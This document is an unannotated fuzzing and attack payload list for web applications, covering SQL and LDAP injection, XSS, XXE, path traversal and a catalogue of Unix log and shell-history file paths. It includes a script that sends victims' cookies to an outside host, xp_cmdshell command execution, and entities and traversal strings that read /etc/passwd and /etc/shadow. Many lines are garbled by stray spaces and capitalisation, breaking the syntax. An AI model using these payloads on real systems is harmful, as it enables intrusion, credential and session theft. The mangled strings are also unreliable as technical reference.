0 or 1 = 1
'Or 0 = 0 -
"Or 0 = 0 -
or 0 = 0 -
'Or 0 = 0 #
"Or 0 = 0 #
or 0 = 0 #
'Or 1 = 1 -
"Or 1 = 1 -
'Or '1' = '1 '-
"'Or 1 -'"
or 1 = 1 -
or% 201 = 1
or% 201 = 1 -
'Or 1 = 1 or''='
"Or 1 = 1 or" "="
'Or a = a -
"Or" a "=" a
') Or (' a '=' a
") Or (" a "=" a
hi "or" a "=" a
hi "or 1 = 1 -
hi 'or 1 = 1 -
hi 'or' a '=' a
hi ') or (' a '=' a
hi ") or (" a "=" a
'Hi' or 'x' = 'x';
@ Variable
, @ Variable
PRINT
PRINT @ @ variable
select
insert
as
or
procedure
limit
order by
asc
desc
delete
update
distinct
having
truncate
replace
like
handler
bfilename
'Or username like'%
'Or uname like'%
'Or userid like'%
'Or uid like'%
'Or user like'%
exec xp
exec sp
'; Exec master .. xp_cmdshell
'; Exec xp_regread
t'exec master .. xp_cmdshell 'nslookup www.google.com' -
- Sp_password
\ X27UNION SELECT
'UNION SELECT
'UNION ALL SELECT
'Or (EXISTS)
'(Select top 1
'| | UTL_HTTP.REQUEST
1; SELECT% 20 *
to_timestamp_tz
tz_offset
<>"'%;)(&+
'% 20or% 201 = 1
% 27% 20or% 201 = 1
% 20 $ (sleep% 2050)
% 20'sleep% in 2050 '
char% 4039% 41% 2b% 40SELECT
'% 20OR
'Sqlattempt1
(Sqlattempt2)
|
% 7C
* |
% 2A% 7C
* (| (Mail =*))
% 2A% 28% 7C% 28mail% 3D% 2A% 29% 29
* (| (Objectclass =*))
% 2A% 28% 7C% 28objectclass% 3D% 2A% 29% 29
(
28%
)
29%
&
26%
!
21%
'Or 1 = 1 or''='
'Or''='
x 'or 1 = 1 or' x '=' y
/
/ /
/ / *
* / *


XSS

"> <script>"
<script> alert ("XSS") </ script>
<<script> Alert ("XSS ");//<</ script>
<script> alert (document.cookie) </ script>
'> <script> Alert (document.cookie) </ script>
'> <script> Alert (document.cookie); </ script>
\ "; Alert ('XSS');//
% 3cscript% 3ealert ("XSS");% 3c/script% 3e
% 3cscript% 3ealert (document.cookie);% 3c% 2fscript% 3e
% 3Cscript% 3Ealert (% 22X% 20SS% 22);% 3C/script% 3E
& Ltscript & gtalert (document.cookie); </ script>
& Ltscript & gtalert (document.cookie); & ltscript & gtale rt
<xss> <script> alert ('XSS') </ script> </ vulnerable>
<IMG% 20SRC = 'javascript: Alert (document.cookie) '>
<IMG SRC = "javascript: Alert ('XSS');">
<IMG SRC = "javascript: Alert ('XSS') "
<IMG SRC = javascript: Alert ('XSS')>
<IMG SRC = javascript: Alert ('XSS')>
<IMG SRC = javascript: Alert ("XSS")>
<IMG SRC = `javascript: Alert ("'XSS'")`>
<IMG """> <SCRIPT> Alert ("XSS") </ SCRIPT> ">
<IMG SRC = javascript: Alert (String.fromCharCode (88,83,83))>
<IMG%20SRC='javasc Ript:alert(document.cookie)'>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">
<IMG SRC = "javascript: Alert ('XSS');">
<IMG DYNSRC = "javascript: Alert ('XSS') ">
<IMG LOWSRC = "javascript: Alert ('XSS') ">
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%2 3x6c;ert(document.%26%23x63;ookie)'>
<IMG SRC = javascript: Alert ('XSS')>
<IMG SRC = javascript: Alert ('XSS')>
<IMG SRC = javascrip & # x74: alert ('X & # x53S' & # x29>
'% 3CIFRAME% 20SRC = javascript: Alert (% 2527XSS% 2527)% 3 E% 3C/IFRAME% 3E
"> <script> Document.location = 'http://your.site.com/cgi-bin/cookie.cgi?' + Document.cookie </ script>
% 22% 3E% 3Cscript% 3Edocument% 2Elocation% 3D% 27http% 3A% 2F% 2Fyour% 2Esite% 2Ecom% 2Fcgi% 2Dbin% 2Fcookie% 2Ecgi% 3F%

27% 20% 2Bdocument% 2Ecookie% 3C% 2Fscript% 3E

'';!--"< XSS >=&{()}



XML (XPath injection, CDATA-wrapped markup, external entities / XXE, XML data islands)

count (/ child:: node ())
x 'or name () =' username 'or' x '=' y
<name>','')); phpinfo (); exit ;/*</ name>
<! [CDATA [<script> var n = 0; while (true) {n ++;}</ script>]]>
<! [CDATA [<]]> SCRIPT <! [CDATA [>]]> alert ('XSS');<![ CDATA [<]]>/ SCRIPT <! [CDATA [>]]>
<? Xml version = "1.0"
<? Xml version = "1.0" encoding = "ISO-8859-1"?> <foo> <! [CDATA ['or 1 = 1 or''=']]></ foo>
<? Xml version = "1.0" encoding = "ISO-8859-1 "?><! DOCTYPE foo [<! ELEMENT foo ANY> <! ENTITY xxe SYSTEM" file: / / c: /

boot.ini ">]> <foo> &xxe; </ foo>
<? Xml version = "1.0" encoding = "ISO-8859-1 "?><! DOCTYPE foo [<! ELEMENT foo ANY> <! ENTITY xxe SYSTEM" file ://// etc /

passwd ">]>< foo> &xxe; </ foo>
<? Xml version = "1.0" encoding = "ISO-8859-1 "?><! DOCTYPE foo [<! ELEMENT foo ANY> <! ENTITY xxe SYSTEM" file ://// etc /

shadow ">]>< foo> &xxe; </ foo>
<? Xml version = "1.0" encoding = "ISO-8859-1 "?><! DOCTYPE foo [<! ELEMENT foo ANY> <! ENTITY xxe SYSTEM" file ://// dev /

random ">]>< foo> &xxe; </ foo>
<xml ID=I> <X> <C> <! [CDATA [<IMG SRC="javas]]> <! [CDATA [cript: alert ('XSS');">]]>
<xml ID="xss"> <I> <B> <IMG SRC = "javas <! - -> cript: alert ('XSS')"></ B> </ I> </ xml > <SPAN DATASRC="#xss"

DATAFLD="B" DATAFORMATAS="HTML"> </ SPAN> </ C> </ X> </ xml> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> < / SPAN>
<xml SRC="xsstest.xml" ID=I> </ xml> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> </ SPAN>
<HTML Xmlns:xss> <? Import namespace = "xss" implementation = "http://ha.ckers.org/xss.htc"> <xss:xss> XSS </ xss: xss> </

HTML>



Path traversal (directory traversal, with null-byte and encoded variants)

.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / hosts% 00
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / hosts
.. / .. / Boot.ini
/../../../../../../../../% 2A
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / passwd% 00
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / passwd
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / shadow% 00
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / shadow
/../../../../../../../../../../ Etc / passwd ^ ^
/../../../../../../../../../../ Etc / shadow ^ ^
/../../../../../../../../../../ Etc / passwd
/../../../../../../../../../../ Etc / shadow
/./././././././././././ Etc / passwd
/./././././././././././ Etc / shadow
\ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Etc \ passwd
\ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Etc \ shadow
.. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Etc \ passwd
.. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Etc \ shadow
/ .. \ ../.. \ ../.. \ ../.. \ ../.. \ ../.. \ .. / Etc / passwd
/ .. \ ../.. \ ../.. \ ../.. \ ../.. \ ../.. \ .. / Etc / shadow
. \ \. /. \ \. /. \ \. /. \ \. /. \ \. /. \ \. / Etc / passwd
. \ \. /. \ \. /. \ \. /. \ \. /. \ \. /. \ \. / Etc / shadow
\ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Etc \ passwd% 00
\ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Etc \ shadow% 00
.. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Etc \ passwd% 00
.. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Etc \ shadow% 00
% 0a/bin/cat% 20/etc/passwd
% 0a/bin/cat% 20/etc/shadow
00% 00/etc/passwd%
00% 00/etc/shadow%
% 00../../../../../../etc/passwd
% 00../../../../../../etc/shadow
/../../../../../../../../../../../ Etc / passwd% 00.jpg
/../../../../../../../../../../../ Etc / passwd% 00.html
/ ..% C0% af ../..% c0% af ../..% c0% af ../..% c0% af ../..% c0% af ../..% c0 % af.. / etc / passwd
/ ..% C0% af ../..% c0% af ../..% c0% af ../..% c0% af ../..% c0% af ../..% c0 % af.. / etc / shadow
/% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e / etc / passwd
/% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e / etc / shadow
% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% May 2% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c

..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 00
/% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% May 2% 5c ..% 25% 5c .. % 25% 5c ..% 25% 5c ..% 25% 5c

..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 00
% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% May 2% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c

..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 00
% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% May 2% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c

..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 255cboot.ini
/% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% 25% 5c ..% May 2% 5c ..% 25% 5c .. % 25% 5c ..% 25% 5c ..% 25% 5c

..% 25% 5c ..% 25% 5c ..% 25% 5c..winnt/desktop.ini
\ \ '/ Bin / cat% 20/etc/passwd \ \'
\ \ '/ Bin / cat% 20/etc/shadow \ \'
.. / .. / .. / .. / .. / .. / .. / .. / Conf / server.xml
/../../../../../../../../ Bin / id |
C: / inetpub / wwwroot / global.asa
C: \ inetpub \ wwwroot \ global.asa
C: / boot.ini
C: \ boot.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Localstart.asp% 00
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Localstart.asp
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Boot.ini% 00
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Boot.ini
/./././././././././././ Boot.ini
/../../../../../../../../../../../ Boot.ini% 00
/../../../../../../../../../../../ Boot.ini
/ .. \ ../.. \ ../.. \ ../.. \ ../.. \ ../.. \ .. / Boot.ini
/. \ \. /. \ \. /. \ \. /. \ \. /. \ \. /. \ \. / Boot.ini
\ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Boot.ini
.. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Boot.ini% 00
.. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ .. \ Boot.ini
/../../../../../../../../../../../ Boot.ini% 00.html
/../../../../../../../../../../../ Boot.ini% 00.jpg
/.../.../.../.../.../
..% C0% af ../..% c0% af ../..% c0% af ../..% c0% af ../..% c0% af ../..% c0% af.. / boot.ini
/% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e /% 2e% 2e / boot.ini
 


Log, accounting and history file locations, by operating system

IRIX:

/var/adm/SYSLOG
/var/adm/sulog
/var/adm/utmp
/var/adm/utmpx
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/lastlog/username
/usr/spool/lp/log
/var/adm/lp/lpd-errs
/usr/lib/cron/log
/var/adm/loginlog
/var/adm/pacct
/var/adm/dtmp
/var/adm/acct/sum/loginlog
/var/adm/X0msgs
/var/adm/crash/vmcore
/var/adm/crash/unix

AIX:

/var/adm/pacct
/var/adm/wtmp
/var/adm/dtmp
/var/adm/qacct
/var/adm/sulog
/var/adm/ras/errlog
/var/adm/ras/bootlog
/var/adm/cron/log
/etc/utmp
/etc/security/lastlog
/etc/security/failedlogin
/usr/spool/mqueue/syslog

SunOS:

/var/adm/messages
/var/adm/aculogs
/var/adm/aculog
/var/adm/sulog
/var/adm/vold.log
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/utmp
/var/adm/utmpx
/var/adm/log/asppp.log
/var/log/syslog
/var/log/POPlog
/var/log/authlog
/var/adm/pacct
/var/lp/logs/lpsched
/var/lp/logs/lpNet
/var/lp/logs/requests
/var/cron/log
/var/saf/_log
/var/saf/port/log

Linux:

/var/log/lastlog
/var/log/telnetd
/var/run/utmp
/var/log/secure
/root/.ksh_history
/root/.bash_history
/root/.bash_logout
/var/log/wtmp
/etc/wtmp
/var/run/utmp
/etc/utmp
/var/log
/var/adm
/var/apache/log
/var/apache/logs
/usr/local/apache/log
/usr/local/apache/logs
/var/log/acct
/var/log/xferlog
/var/log/messages
/var/log/proftpd/xferlog.legacy
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/httpd/error_log
/var/log/httpd/access_log
/etc/httpd/logs/access_log
/etc/httpd/logs/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/httpsd/ssl.access_log
/etc/mail/access
/var/log/qmail
/var/log/smtpd
/var/log/samba
/var/log/samba-log.%m
/var/lock/samba
/root/.Xauthority
/var/log/poplog
/var/log/news.all
/var/log/spooler
/var/log/news
/var/log/news/news
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
/var/spool/tmp
/var/spool/errors
/var/spool/logs
/var/spool/locks
/usr/local/www/logs/thttpd_log
/var/log/thttpd_log
/var/log/ncftpd/misclog.txt
/var/log/ncftpd.errs
/var/log/auth

Red Hat, Mac OS X

/var/log/httpd/access_log
/var/log/httpd/error_log

Solaris

/var/apache/logs/access_log
/var/apache/logs/error_log

SuSE Linux Enterprise Server

/var/log/httpd/access_log
/var/log/httpd/error_log

Lampp


/opt/lampp/logs/error_log
/opt/lampp/logs/access_log

Debian


/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache-ssl/error.log
/var/log/apache-ssl/access.log

FreeBSD

/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log

OpenBSD

/var/www/log/access_log
/var/www/log/error_log